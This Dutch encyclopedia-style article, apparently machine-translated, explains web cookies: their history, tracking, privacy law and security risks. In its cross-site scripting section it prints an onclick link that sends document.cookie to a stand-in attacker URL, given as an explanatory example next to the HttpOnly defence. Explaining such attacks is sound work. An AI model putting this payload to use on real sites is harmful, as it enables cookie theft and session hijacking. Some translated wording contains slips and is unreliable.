in Definities, wiki

Internetcookie: wat is het? Definitie, oorsprong, typen en privacy

Wat is de rol van een cookie, wat is het en wat zijn de soorten cookies? 🍪

56.3k keer bekeken 384 Stemmen

Internetcookie: wat is het? Definitie, oorsprong, typen en privacy
Internetcookie: wat is het? Definitie, oorsprong, typen en privacy

Un cookie of webcookie (of koekje, afgekort als getuige in Quebec) wordt door het HTTP-communicatieprotocol gedefinieerd als een opeenvolging van informatie die door een HTTP-server naar een HTTP-client wordt verzonden en die laatstgenoemde elke keer dat dezelfde HTTP-server wordt opgevraagd onder bepaalde voorwaarden terugstuurt.

De cookie is het equivalent van een klein tekstbestand dat op de terminal is opgeslagen van de internetgebruiker. Ze bestaan ​​al meer dan 20 jaar en stellen website-ontwikkelaars in staat gebruikersgegevens op te slaan om hun navigatie te vergemakkelijken en bepaalde functionaliteiten mogelijk te maken. Cookies zijn altijd min of meer controversieel geweest omdat ze resterende persoonlijke informatie bevatten die mogelijk door derden kan worden uitgebuit.

Het wordt als een HTTP-header door de webserver naar de webbrowser verzonden, die het elke keer dat het de server benadert ongewijzigd retourneert. Hiervoor kan een cookie worden gebruikt een authenticatie, een sessie (staatsonderhoud), en voor specifieke informatie over de gebruiker opslaan, zoals sitevoorkeuren of de inhoud van een elektronisch winkelwagentje. De term cookie is afgeleid van magisch koekje, een bekend concept in UNIX-computing, dat het idee en de naam van browsercookies inspireerde. Er zijn enkele alternatieven voor cookies, elk met hun eigen gebruik, voor- en nadelen.

Omdat het eenvoudige tekstbestanden zijn, zijn cookies niet uitvoerbaar. Zij zijn niet noch spyware noch virussen, hoewel cookies van sommige sites door veel antivirussoftware worden gedetecteerd omdat gebruikers hiermee kunnen worden gevolgd wanneer ze meerdere sites bezoeken. 

De meeste moderne browsers staan ​​gebruikers toe beslissen of u cookies accepteert of weigert. Gebruikers kunnen dat ook kies hoe lang cookies worden bewaard. De volledige afwijzing van cookies maakt sommige sites echter onbruikbaar. Bewaar bijvoorbeeld winkelwagentjes of sites waarvoor aanmelding met inloggegevens (gebruikersnaam en wachtwoord) vereist is.

inhoud

Historique

de term koekje is afgeleid van de Engelse term magisch koekje, wat een gegevenspakket is dat een programma ontvangt en ongewijzigd retourneert. Cookies werden toen al gebruikt in de IT Lou Montulli kwam op het idee om ze te gebruiken in webcommunicatie in juni 1994. Op dat moment was hij in dienst van Netscape Communications, dat voor een klant een e-commerce applicatie had ontwikkeld. Cookies boden een oplossing voor het probleem van de betrouwbaarheid van de virtuele winkelwagenimplementatie van een winkel.

John Giannandrea en Lou Montulli schreven datzelfde jaar de eerste cookiespecificatie van Netscape. Versie 0.9 beta van Mosaic Netscape, uitgebracht op 13 oktober 1994, geïntegreerd cookie technologie (zie bericht). Het eerste (niet-experimentele) gebruik van cookies was om vast te stellen of bezoekers van de Netscape-website de site eerder hadden bezocht. Montulli diende in 1995 een octrooiaanvraag in voor cookie-technologie en het Amerikaanse octrooi 5774670 werd verleend. verleend in 1998.

Nadat ze in 0.9 in Netscape 1994 beta waren geïmplementeerd, werden cookies geïntegreerd in Internet Explorer 2, uitgebracht in oktober 1995.

De introductie van cookies is nog niet algemeen bekend bij het publiek. In het bijzonder werden cookies standaard geaccepteerd in de browserinstellingen en werden gebruikers niet op de hoogte gebracht van hun aanwezigheid. Sommige mensen waren rond het eerste kwartaal van 1995 op de hoogte van het bestaan ​​van cookies, maar het grote publiek begon pas met het bestaan ​​ervan nadat de Financial Times op 12 februari 1996 een artikel publiceerde. In datzelfde jaar kregen cookies veel media-aandacht vanwege mogelijke inbreuken op de privacy. Het onderwerp cookies kwam aan de orde in twee consultaties van de Amerikaanse Federal Trade Commission in 1996 en 1997.

De ontwikkeling van de officiële cookiespecificatie was al aan de gang. De eerste discussies over de officiële specificatie vonden plaats in april 1995 op de www-talk mailinglijst. Er werd een speciale IETF-werkgroep gevormd. Twee alternatieve voorstellen voor het introduceren van state-naar-HTTP-transacties werden voorgesteld door respectievelijk Brian Behlendorf en David Kristol, maar de groep, geleid door Kristol zelf, besloot de specificatie van Netscape als uitgangspunt te nemen. In februari 1996 stelde de werkgroep vast dat cookies van derden een aanzienlijke bedreiging vormden voor de privacy. De specificatie van de groep werd uiteindelijk gepubliceerd als RFC 2109.

Vanaf eind 2014 zien we op veel sites een banner over cookies. Er is ten minste één browserextensie waarmee de spandoek niet weergegeven.

Soorten cookies en gebruik

Sessie beheer

Cookies kunnen worden gebruikt om gebruikersgegevens bij te houden tijdens de navigatie, maar ook bij meerdere bezoeken. Cookies zijn geïntroduceerd om een ​​middel te bieden voor het implementeren van elektronische winkelwagentjes, een virtueel apparaat waarin de gebruiker de items die hij wil kopen kan verzamelen tijdens het browsen op de site.

Tegenwoordig slaan apps zoals winkelwagentjes in plaats daarvan de lijst met items op in een database op een server, wat de voorkeur heeft; dan ze in de cookie zelf op te slaan. De webserver verzendt een cookie met een uniek sessie-ID. De webbrowser retourneert vervolgens deze sessie-ID bij elk volgend verzoek en de items in het winkelmandje worden opgeslagen en gekoppeld aan dezelfde unieke sessie-ID.

Frequent gebruik van cookies is handig om met inloggegevens in te loggen op een site. Kort gezegd stuurt de webserver eerst een cookie met daarin een uniek sessie-ID. Vervolgens geven gebruikers hun inloggegevens op (meestal een gebruikersnaam en wachtwoord). De webapplicatie verifieert vervolgens de sessie en geeft de gebruiker toegang tot de service.

Gepersonaliseerd

Cookies kunnen worden gebruikt om informatie over de gebruiker van een site te onthouden, om hem in de toekomst passende inhoud te tonen. Een webserver kan bijvoorbeeld een cookie sturen met de laatste gebruikersnaam die is gebruikt om in te loggen op die website, zodat de gebruikersnaam vooraf kan worden ingevuld bij toekomstige bezoeken.

Veel websites gebruiken cookies voor personalisatie op basis van gebruikersvoorkeuren. Gebruikers selecteren hun voorkeuren in een formulier en leggen deze voor aan de server. De server codeert de voorkeuren in een cookie en stuurt deze terug naar de browser. Elke keer dat de gebruiker een pagina van deze site bezoekt, retourneert de browser vervolgens de cookie en dus de lijst met voorkeuren; de server kan de pagina vervolgens aanpassen aan de voorkeuren van de gebruiker. Op de Wikipedia-website kunnen gebruikers bijvoorbeeld de skin kiezen van de site die ze verkiezen. Met de Google-zoekmachine kunnen gebruikers (zelfs als ze niet zijn geregistreerd) het aantal resultaten kiezen dat ze op elke resultatenpagina willen zien.

Volgen

Tracking cookies worden gebruikt om het surfgedrag van internetgebruikers te volgen. Deels kan dit ook door gebruik te maken van het IP-adres van de computer die een pagina opvraagt ​​of door gebruik te maken van de 'referrer' HTTP-header die de client bij elke aanvraag meestuurt, maar cookies zorgen voor meer precisie. Dit kan worden gedaan zoals in het volgende voorbeeld:

  1. Als de gebruiker een pagina van een site oproept en het verzoek geen cookie bevat, gaat de server ervan uit dat dit de eerste pagina is die door de gebruiker wordt bezocht. De server maakt vervolgens een willekeurige reeks en stuurt deze samen met de opgevraagde pagina naar de browser.
  2. Vanaf dit moment wordt de cookie automatisch door de browser verzonden telkens wanneer een nieuwe pagina van de site wordt opgeroepen. De server verzendt de pagina zoals gewoonlijk, maar logt ook de URL van de opgeroepen pagina, de datum, het tijdstip van het verzoek en de cookie in een logbestand.

Door het logbestand te bekijken kan vervolgens worden nagegaan welke pagina's de gebruiker heeft bezocht en in welke volgorde. Als het bestand bijvoorbeeld enkele verzoeken bevat die zijn gedaan met behulp van de id=abc-cookie, kan worden vastgesteld dat al deze verzoeken afkomstig zijn van dezelfde gebruiker. De gevraagde URL, de datum en tijd die aan de verzoeken zijn gekoppeld, maken het mogelijk het browsen van de gebruiker te volgen.

Cookies van derden en webbakens, die hieronder worden uitgelegd, maken bovendien tracking over verschillende sites mogelijk. Single site tracking wordt over het algemeen gebruikt voor statistische doeleinden. Daarentegen wordt het volgen van verschillende sites met behulp van cookies van derden over het algemeen gebruikt door advertentiebedrijven om anonieme gebruikersprofielen te maken (die vervolgens worden gebruikt om te bepalen welke advertenties aan de gebruiker moeten worden getoond en om hem e-mails te sturen die overeenkomen met deze advertenties — SPAM ).

Tracking cookies vormen een risico op inbreuk op de privacy van gebruikers, maar ze kunnen eenvoudig worden verwijderd. De meeste moderne browsers bevatten een optie om permanente cookies automatisch te verwijderen bij het sluiten van de applicatie.

Cookies van derden

Afbeeldingen en andere objecten op een webpagina kunnen zich op andere servers bevinden dan die waarop de pagina wordt gehost. Om de pagina weer te geven, downloadt de browser al deze objecten. De meeste websites bevatten informatie uit verschillende bronnen. Als u bijvoorbeeld www.example.com in uw browser typt, zullen er vaak objecten of advertenties op een deel van de pagina staan ​​die afkomstig zijn van andere bronnen, d.w.z. van een ander domein dan www.example.com. "First" party cookies zijn cookies die worden ingesteld door het domein dat wordt vermeld in de adresbalk van de browser. Cookies van derden worden ingesteld door een van de pagina-objecten die afkomstig is van een ander domein.

Standaard accepteren browsers zoals Mozilla Firefox, Microsoft Internet Explorer en Opera cookies van derden, maar gebruikers kunnen de instellingen in browseropties wijzigen om ze te blokkeren. Er is geen veiligheidsrisico inherent aan cookies van derden die webfunctionaliteit mogelijk maken, maar ze worden ook gebruikt om gebruikers te volgen. van werf tot werf.

Tools zoals Ghostery die beschikbaar zijn voor alle browsers, inclusief Google Chrome, kunnen uitwisselingen tussen derden blokkeren.

Implementatie

Een mogelijke interactie tussen een webbrowser en de server die de webpagina host. De server stuurt een cookie naar de browser en de browser stuurt deze terug wanneer hij een andere pagina oproept.
Een mogelijke interactie tussen een webbrowser en de server die de webpagina host. De server stuurt een cookie naar de browser en de browser stuurt deze terug wanneer hij een andere pagina oproept.

Cookies zijn kleine stukjes data die door de webserver naar de browser worden gestuurd. De browser stuurt ze ongewijzigd terug naar de server, waarbij de status (geheugen van gebeurtenissen uit het verleden) wordt geïntroduceerd in de anders staatloze HTTP-transactie. Zonder cookies is elke opvraging van een webpagina of een onderdeel van een webpagina een geïsoleerde gebeurtenis, onafhankelijk van andere verzoeken aan dezelfde site. Naast dat ze door de webserver kunnen worden ingesteld, kunnen cookies ook worden ingesteld door scripttalen zoals JavaScript, indien ondersteund en geautoriseerd door de browser.

De officiële cookiespecificatie suggereert dat browsers een minimum aantal cookies moeten kunnen opslaan en opnieuw verzenden. Concreet moet een browser minimaal 300 cookies van elk vier kilobyte kunnen opslaan, en minimaal 20 cookies voor een enkele server of domein.

Volgens paragraaf 3.1 van RFC 2965, cookienamen zijn niet hoofdlettergevoelig.

Een cookie kan de vervaldatum specificeren, in welk geval de cookie op deze datum wordt verwijderd. Als de cookie geen vervaldatum specificeert, wordt de cookie verwijderd zodra de gebruiker zijn browser verlaat. Daarom is het specificeren van een vervaldatum een ​​manier om de cookie meerdere sessies te laten overleven. Om deze reden worden cookies met een houdbaarheidsdatum genoemd aanhoudend. Een voorbeeldtoepassing: een winkelsite kan permanente cookies gebruiken om de items vast te leggen die gebruikers in hun winkelwagentje hebben geplaatst (in werkelijkheid kan de cookie verwijzen naar een item dat is opgeslagen in een database op de site van verkoop, en niet in uw computer) . Op deze manier kunnen gebruikers, als ze hun browser verlaten zonder een aankoop te doen en er later naar terugkeren, de items in de winkelwagen weer vinden. Als deze cookies geen vervaldatum zouden geven, zouden ze verlopen wanneer de browser wordt gesloten en zou de informatie over de inhoud van het winkelmandje verloren gaan.

Cookies kunnen beperkt zijn tot een specifiek domein, subdomein of pad op de server die ze heeft gemaakt.

De overdracht van webpagina's gebeurt met behulp van het HyperText Transfer Protocol (HTTP). Door cookies te negeren, roepen browsers een pagina op van webservers door ze meestal een korte tekst te sturen HTTP-verzoek. Om bijvoorbeeld toegang te krijgen tot de pagina www.example.org/index.html, maken browsers verbinding met de server www.example.org en sturen ze een verzoek dat er als volgt uitziet:

GET /index.html HTTP/1.1Host: www.example.org
Navigateurserveur

De server reageert door de opgevraagde pagina te sturen, voorafgegaan door een soortgelijke tekst, waarna het geheel wordt aangeroepen HTTP-antwoord. Dit pakket kan regels bevatten die de browser instrueren om cookies op te slaan:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML-pagina)
Navigateurserveur

De server verstuurt de Set-Cookie-regel alleen als de server wil dat de browser een cookie opslaat. Set-Cookie is een verzoek aan de browser om de tekenreeks name=value op te slaan en terug te sturen in alle toekomstige verzoeken aan de server. Als de browser cookies ondersteunt en cookies zijn ingeschakeld in de browseropties, wordt de cookie opgenomen in alle volgende verzoeken aan dezelfde server. De browser roept bijvoorbeeld de pagina www.example.org/news.html op door het volgende verzoek naar de server www.example.org te sturen:

GET /news.html HTTP/1.1Host: www.example.orgCookie: naam=waardeAccepteren: */*
Navigateurserveur

Dit is een verzoek om een ​​andere pagina van dezelfde server en verschilt van de eerste hierboven omdat het een tekenreeks bevat die de server eerder naar de browser heeft gestuurd. Dankzij dit middel weet de server dat dit verzoek is gekoppeld aan het vorige. De server reageert door de opgeroepen pagina te verzenden en ook door er andere cookies aan toe te voegen.

De waarde van de cookie kan door de server worden gewijzigd door een nieuwe regel Set-Cookie: name=new_value te sturen als reactie op de opgeroepen pagina. De browser vervangt dan de oude waarde door de nieuwe.

De regel Set-Cookie wordt meestal gemaakt door een CGI-programma of een andere scripttaal, niet door de HTTP-server. De HTTP-server (bijvoorbeeld: Apache) zal alleen het resultaat van het programma (een document voorafgegaan door de header met de cookies) naar de browser sturen.

Cookies kunnen ook worden ingesteld door JavaScript of andere vergelijkbare talen die in de browser worden uitgevoerd, d.w.z. aan de clientzijde in plaats van aan de serverzijde. In JavaScript wordt hiervoor het object document.cookie gebruikt. De instructie document.cookie = "temperature=20" maakt bijvoorbeeld een cookie met de naam "temperature" en met een waarde van 20.

Voorbeeld van een HTTP-reactie van google.com, die een cookie met attributen plaatst.
Voorbeeld van een HTTP-reactie van google.com, die een cookie met attributen plaatst.

Naast het naam/waarde-paar kan een cookie ook een vervaldatum, een pad, een domeinnaam en het beoogde type verbinding, d.w.z. normaal of versleuteld, bevatten. RFC 2965 definieert ook dat cookies een verplicht versienummer moeten hebben, maar dit wordt over het algemeen weggelaten. Deze gegevensdelen volgen het paar naam=nieuwe_waarde en worden gescheiden door puntkomma's. Een cookie kan bijvoorbeeld door de server worden gemaakt door een Set-Cookie-regel te verzenden: name=new_value; verloopt=datum; pad=/; domein=.voorbeeld.org.

Cookies vervallen en worden vervolgens niet door de browser naar de server gestuurd in de volgende situaties:

  • Wanneer de browser is gesloten, als de cookie niet permanent is.
  • Wanneer de vervaldatum van de cookie is verstreken.
  • Wanneer de vervaldatum van de cookie wordt gewijzigd (door de server of het script) naar een datum in het verleden.
  • Wanneer de browser de cookie verwijdert op verzoek van de gebruiker.

In de derde situatie kunnen servers of scripts expliciet een cookie verwijderen. Merk op dat het met de Google Chrome-webbrowser mogelijk is om de vervaldatum van een bepaalde cookie te kennen door naar de inhoudsinstellingen te gaan. Een cookie die op een computer is opgeslagen, kan daar tientallen jaren blijven staan ​​als er geen procedure wordt gevolgd om het te wissen.

Ontvangen ideeën

Sinds hun introductie op internet zijn er veel ideeën over cookies op internet en in de media rondgegaan. In 1998 stelde CIAC, een monitoringteam voor computerincidenten van het Amerikaanse ministerie van Energie, vast dat beveiligingsproblemen in cookies "in wezen niet bestonden" en legde uit dat "informatie over de oorsprong van uw bezoeken en de details van de webpagina's die u hebt bezocht bestaan ​​al in de logbestanden van de webservers”. In 2005 publiceerde Jupiter Research de resultaten van een onderzoek, waarin een aanzienlijk percentage van de respondenten de volgende uitspraken overwoog:

  • Koekjes zijn als virus, infecteren ze de harde schijven van gebruikers.
  • Cookies genereren pop-up.
  • Voor het verzenden worden cookies gebruikt spam.
  • Cookies worden alleen gebruikt voor advertenties.

Cookies kunnen geen informatie van de computer van de gebruiker wissen of lezen. Cookies maken het echter mogelijk om de door een gebruiker bezochte webpagina's op een bepaalde site of een reeks sites te detecteren. Deze informatie kan worden verzameld in een gebruikersprofiel dat kan worden gebruikt of doorverkocht aan derden, wat ernstige privacyschendingen kan opleveren. Sommige profielen zijn anoniem, in die zin dat ze geen persoonlijke informatie bevatten, maar zelfs dergelijke profielen kunnen twijfelachtig zijn.

Volgens hetzelfde onderzoek weet een groot percentage van de internetgebruikers niet hoe ze cookies kunnen verwijderen. Een van de redenen waarom mensen cookies niet vertrouwen, is dat sommige sites misbruik hebben gemaakt van het persoonlijk identificeerbare aspect van cookies en deze informatie met andere bronnen hebben gedeeld. Een groot percentage van gerichte advertenties en ongevraagde e-mail, die als spam worden beschouwd, is afkomstig van informatie die is verzameld via trackingcookies.

Browser instellingen

De meeste browsers ondersteunen cookies en stellen de gebruiker in staat deze uit te schakelen. De meest voorkomende opties zijn:

  • Schakel cookies volledig in of uit, zodat ze constant worden geaccepteerd of geblokkeerd.
  • Laat de gebruiker de actieve cookies op een bepaalde pagina zien door javascript: alert(document.cookie) in de adresbalk van de browser in te voeren. Sommige browsers bevatten een cookiebeheerder voor de gebruiker die cookies die momenteel door de browser zijn opgeslagen, kan bekijken en selectief kan verwijderen.

De meeste browsers staan ​​ook volledige verwijdering van persoonlijke gegevens toe, inclusief cookies. Er zijn ook aanvullende modules om cookierechten te beheren.

Privacy en cookies van derden

In dit fictieve voorbeeld heeft een reclamebureau banners geplaatst op twee websites. Door de banners op zijn servers te hosten en cookies van derden te gebruiken, kan het reclamebedrijf de navigatie van de gebruiker op deze twee sites volgen.

Cookies hebben belangrijke implicaties voor de privacy en anonimiteit van internetgebruikers. Hoewel cookies alleen worden teruggestuurd naar de server die ze heeft geplaatst of naar een server die tot hetzelfde internetdomein behoort, kan een webpagina afbeeldingen of andere componenten bevatten die zijn opgeslagen op servers die tot andere domeinen behoren. De cookies die worden ingesteld tijdens het herstel van deze externe componenten worden genoemd cookies van derden. Dit geldt ook voor cookies van ongewenste pop-upvensters.

Advertentiebedrijven gebruiken cookies van derden om gebruikers te volgen op de verschillende sites die ze bezoeken. In het bijzonder kan een reclamebureau een gebruiker volgen over alle pagina's waar het advertentieafbeeldingen of een trackingpixel heeft geplaatst. Kennis van de door de gebruiker bezochte pagina's stelt het reclamebedrijf in staat zich te richten op de reclamevoorkeuren van de gebruiker.

De mogelijkheid om een ​​gebruikersprofiel op te bouwen wordt door sommigen beschouwd als een inbreuk op de privacy, vooral wanneer tracking wordt gedaan over verschillende domeinen met behulp van cookies van derden. Om deze reden hebben sommige landen een cookiewetgeving.

De regering van de Verenigde Staten voerde in 2000 strikte regels in voor het plaatsen van cookies, nadat was onthuld dat het Witte Huis Drug Policy Office cookies gebruikte om de computers te volgen van gebruikers die online drugsadvertenties bekeken. In 2002 ontdekte privacyactivist Daniel Brandt dat de CIA permanente cookies achterliet op computers die haar websites hadden bezocht. Toen de CIA op de hoogte werd gebracht van deze inbreuk, verklaarde ze dat deze cookies niet opzettelijk waren verzonden en stopte ze met het plaatsen ervan. Op 25 december 2005 ontdekte Brandt dat de National Security Agency (NSA) vanwege een software-update twee permanente cookies op de computers van bezoekers had achtergelaten. Na verwittiging heeft de NSA cookies onmiddellijk uitgeschakeld.

In het Verenigd Koninkrijk, de Cookie wet “, in werking getreden op 25 mei 2012, verplicht de sites om hun intenties bekend te maken, waardoor de gebruikers kunnen kiezen of ze al dan niet sporen van hun passage op internet willen achterlaten. Zo kunnen ze worden beschermd tegen gerichte advertenties. Echter, volgens The Guardian, is de toestemming van internetgebruikers niet noodzakelijkerwijs expliciet; er zijn wijzigingen aangebracht in de voorwaarden voor toestemming van de gebruiker, waardoor het aldus geïmpliceerd.

Richtlijn 2002/58 betreffende privacy

Richtlijn 202/58 privacy en elektronische communicatie bevat regels over het gebruik van cookies. Met name artikel 5, lid 3 van deze richtlijn vereist dat de opslag van gegevens (zoals cookies) op de computer van de gebruiker alleen kan gebeuren als:

  • de gebruiker wordt geïnformeerd over het gebruik van de gegevens;
  • de gebruiker krijgt de mogelijkheid om deze opslagoperatie te weigeren. In dit artikel staat echter ook dat het bewaren van gegevens om technische redenen is uitgezonderd van deze wet.

De richtlijn, die vanaf oktober 2003 moest worden geïmplementeerd, werd echter slechts zeer gebrekkig in de praktijk gebracht volgens een rapport van december 2004, waarin ook werd opgemerkt dat bepaalde lidstaten (Slowakije, Letland, Griekenland, België en Luxemburg) de richtlijn nog niet hadden omgezet richtlijn omgezet in nationaal recht.

Volgens het advies van de G29 in 2010 wordt deze richtlijn, die met name het gebruik van cookies voor gedragsreclamedoeleinden voorschrijft op de uitdrukkelijke toestemming van de internetgebruiker, nog steeds zeer slecht toegepast. In feite doen de meeste sites dit op een manier die niet in overeenstemming is met de richtlijn, door zich te beperken tot een simpele "banner" die informeert over het gebruik van "cookies" zonder informatie te geven over het gebruik, zonder onderscheid te maken tussen "technische" cookies. "tracking" cookies, noch om de gebruiker een reële keuze te bieden om technische cookies (zoals cookies voor het beheer van winkelwagentjes) te behouden en "tracking" cookies te weigeren. In feite werken veel sites niet correct als cookies worden geweigerd, wat niet voldoet aan richtlijn 2002/58 of richtlijn 95/46 (Bescherming van persoonsgegevens).

Richtlijn 2009/136 / EG

Dit materiaal is bijgewerkt door Richtlijn 2009/136/EG van 25 november 2009, waarin staat dat "het opslaan van informatie, of het verkrijgen van toegang tot reeds opgeslagen informatie, in de eindapparatuur van een abonnee of gebruiker alleen is toegestaan ​​op voorwaarde dat de abonnee of gebruiker zijn toestemming heeft gegeven, nadat hij, in overeenstemming met Richtlijn 95/46/EG, duidelijke en volledige informatie tussen anderen heeft ontvangen over de doeleinden van de verwerking”. De nieuwe richtlijn verscherpt dus de verplichtingen voorafgaand aan het plaatsen van cookies op de computer van de internetgebruiker.

In de inleidende overwegingen van de richtlijn specificeert de Europese wetgever echter: "Waar technisch mogelijk en effectief, in overeenstemming met de relevante bepalingen van Richtlijn 95/46/EG, kan de toestemming van de gebruiker met betrekking tot de verwerking worden uitgedrukt door middel van de gebruik van de juiste instellingen van een browser of andere applicatie”. Maar in feite maakt geen enkele browser het tot nu toe mogelijk om de essentiële technische cookies te scheiden van de optionele cookies die aan de keuze van de gebruiker moeten worden overgelaten.

Deze nieuwe richtlijn werd in juli 2012 door Belgische parlementsleden omgezet. Uit een studie uit 2014 blijkt dat zelfs parlementsleden moeite hebben om zich aan te melden de beperkingen van de richtlijn.

P3P

De P3P-specificatie omvat de mogelijkheid voor een server om een ​​privacybeleid op te stellen, dat definieert wat voor soort informatie het verzamelt en met welk doel. Dit beleid omvat (maar is niet beperkt tot) het gebruik van informatie die is verzameld met behulp van cookies. Volgens de definities van P3P kan een browser cookies accepteren of weigeren door het privacybeleid te vergelijken met de voorkeuren van de gebruiker of door de gebruiker te vragen het privacybeleid van de server te presenteren.

Veel browsers, waaronder Apple Safari en Microsoft Internet Explorer versie 6 en 7, ondersteunen P3P, waardoor de browser kan bepalen of de opslag van cookies door derden wordt geaccepteerd. Met de Opera-browser kunnen gebruikers cookies van derden weigeren en een globaal en specifiek beveiligingsprofiel voor internetdomeinen aanmaken. Mozilla Firefox versie 2 liet P3P-ondersteuning vallen, maar herstelde het in versie 3.

Cookies van derden kunnen door de meeste browsers worden geblokkeerd om de privacy te vergroten en het volgen van advertenties te verminderen, zonder de webervaring van de gebruiker negatief te beïnvloeden. Veel reclamebureaus bieden een optie afmelden gerichte advertenties, door een generieke cookie in de browser te plaatsen die deze targeting deactiveert, maar een dergelijke oplossing is praktisch niet effectief, wanneer deze wordt gerespecteerd, omdat deze generieke cookie wordt gewist zodra de gebruiker deze cookies verwijdert, waardoor de opt-out wordt geannuleerd besluit uit.

Nadelen van cookies

Naast privacykwesties hebben cookies ook enkele technische nadelen. In het bijzonder identificeren ze gebruikers niet altijd nauwkeurig, kunnen ze de siteprestaties vertragen wanneer ze in grote aantallen voorkomen, kunnen ze worden gebruikt voor beveiligingsaanvallen en zijn ze in strijd met de representatieve staatsoverdracht, architecturale stijl van de software.

Onnauwkeurige identificatie

Als er meer dan één browser op een computer wordt gebruikt, is er in elke browser altijd een aparte opslageenheid voor cookies. Cookies identificeren dus geen persoon, maar de combinatie van een gebruikersaccount, een computer en een webbrowser. Iedereen kan dus deze accounts, computers of browsers gebruiken die over het arsenaal aan cookies beschikken. Op dezelfde manier maken cookies geen onderscheid tussen meerdere gebruikers die dezelfde gebruikersaccount, computer en browser delen, zoals in "internetcafés" of elke andere plaats die gratis toegang geeft tot computerbronnen.

Maar in de praktijk blijkt deze bewering in de meeste gevallen onjuist te zijn, omdat een "persoonlijke" computer (of een smartphone, of tablet, wat erger is) tegenwoordig voornamelijk door één persoon wordt gebruikt. Dit komt neer op het richten op een specifieke persoon en door de hoeveelheid verzamelde informatie komen tot gepersonaliseerde targeting, zelfs als de persoon niet "namelijk" geïdentificeerd is.

Een cookie kan worden gestolen door een andere computer op het netwerk.

Tijdens de normale werking worden cookies teruggestuurd tussen de server (of een groep servers in hetzelfde domein) en de computerbrowser van de gebruiker. Aangezien cookies gevoelige informatie kunnen bevatten (gebruikersnaam, een wachtwoord dat wordt gebruikt voor authenticatie, enz.), mogen hun waarden niet toegankelijk zijn voor andere computers. Cookiediefstal is het onderscheppen van cookies door een niet-geautoriseerde derde partij.

Cookies kunnen worden gestolen via een pakketsnuffelaar in een aanval die sessiekaping wordt genoemd. Verkeer op het net kan worden onderschept en gelezen door andere computers dan de computers die verzenden en ontvangen (vooral op de niet-versleutelde openbare Wi-Fi-ruimte). Dit verkeer omvat cookies die via sessies worden verzonden met behulp van het eenvoudige HTTP-protocol. Wanneer het netwerkverkeer niet versleuteld is, kunnen kwaadwillende gebruikers zo de communicatie van andere gebruikers op het netwerk lezen met behulp van "packet sniffers".

Dit probleem kan worden opgelost door de verbinding tussen de computer van de gebruiker en de server te versleutelen met behulp van het HTTPS-protocol. Een server kan een veilige vlag tijdens het plaatsen van een cookie; de browser verzendt deze alleen via een beveiligde lijn, zoals een SSL-verbinding.

Hoewel veel sites HTTPS-gecodeerde communicatie gebruiken voor gebruikersauthenticatie (d.w.z. de inlogpagina), verzenden ze later sessiecookies en andere gegevens zoals normaal, via niet-gecodeerde HTTP-verbindingen om efficiëntieredenen. Aanvallers kunnen zo de cookies van andere gebruikers onderscheppen en deze op geschikte sites nabootsen of gebruiken bij cookie-aanvallen.

Scripting in de site: een cookie die alleen tussen de server en de client mag worden uitgewisseld, wordt naar een andere derde partij gestuurd.

Een andere manier om cookies te stelen is door sites te scripten en de browser zelf cookies te laten sturen naar kwaadwillende servers die ze nooit ontvangen. Moderne browsers maken het mogelijk om gewilde delen van code van de server uit te voeren. Als cookies tijdens runtime worden geopend, kunnen hun waarden in een of andere vorm worden meegedeeld aan servers die er geen toegang toe zouden moeten hebben. Het versleutelen van cookies voordat ze over het netwerk worden verzonden, helpt de aanval niet te verijdelen.

Dit type in-site scripting wordt doorgaans gebruikt door aanvallers op sites waarop gebruikers HTML-inhoud kunnen plaatsen. Door een deel van de compatibele code in de HTML-bijdrage te integreren, kan een aanvaller cookies van andere gebruikers ontvangen. Kennis van deze cookies kan worden gebruikt door verbinding te maken met dezelfde site met behulp van de gestolen cookies, en zo te worden herkend als de gebruiker van wie de cookies zijn gestolen.

Een manier om dergelijke aanvallen te voorkomen, is door de HttpOnly-vlag te gebruiken; het is een optie, geïntroduceerd sinds versie 6 van Internet Explorer in PHP sinds versie 5.2.0, die is bedoeld om de cookie ontoegankelijk te maken voor de client dicht bij het script. Webontwikkelaars moeten hier echter rekening mee houden bij de ontwikkeling van hun site, zodat ze immuun zijn voor scripting in de site.

Een andere beveiligingsdreiging die wordt gebruikt, is vraagfabricage op de site.

De officiële technische specificatie staat toe dat cookies alleen worden teruggestuurd naar servers in het domein waarvan ze afkomstig zijn. De waarde van cookies kan echter naar andere servers worden verzonden met behulp van andere middelen dan cookie-headers.

Met name scripttalen zoals JavaScript hebben over het algemeen toegang tot cookiewaarden en kunnen willekeurige waarden naar elke server op internet sturen. Deze scriptfunctie wordt gebruikt vanaf websites waarmee gebruikers HTML-inhoud kunnen plaatsen die andere gebruikers kunnen bekijken.

Een aanvaller die op het domein example.com werkt, kan bijvoorbeeld een opmerking plaatsen met de volgende link die verwijst naar een populaire blog waarover hij anders geen controle heeft:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Wanneer een andere gebruiker op deze link klikt, voert de browser het onclick-attribuutgedeelte van de code uit, zodat de tekenreeks document.cookie wordt vervangen door de lijst met gebruikerscookies die voor deze pagina actief zijn. Daarom wordt deze lijst met cookies naar de voorbeeld.com-server gestuurd en kan de aanvaller de cookies van deze gebruiker verzamelen.

Dit type aanval is moeilijk te detecteren aan de kant van de gebruiker omdat het script afkomstig is van hetzelfde domein dat de cookie heeft ingesteld, en de operatie om de waarden te verzenden lijkt te zijn geautoriseerd door dat domein. Er wordt van uitgegaan dat het de verantwoordelijkheid is van de beheerders die dit type site beheren om beperkingen op te leggen die de publicatie van kwaadaardige code voorkomen.

Cookies zijn niet direct zichtbaar voor client-side programma's zoals JavaScript als ze zijn verzonden met de HttpOnly-vlag. Vanuit het oogpunt van de server is het enige verschil dat er in de regel van de Set-Cookie-header een nieuw veld is toegevoegd met de tekenreeks HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Wanneer de browser zo'n cookie ontvangt, wordt deze verondersteld deze normaal te gebruiken in de volgende HTTP-uitwisseling, maar zonder deze zichtbaar te maken voor scripts die aan de clientzijde worden uitgevoerd. De HttpOnly-vlag maakt geen deel uit van enige officiële technische specificatie en wordt niet in alle browsers geïmplementeerd. Merk op dat er momenteel geen manier is om het lezen en schrijven van sessiecookies door de XMLHTTPRequest-methode te voorkomen.

Wijziging van inhoud: een aanvaller stuurt een ongeldige cookie naar een server, mogelijk gemaakt van een geldige cookie die door de server is verzonden.

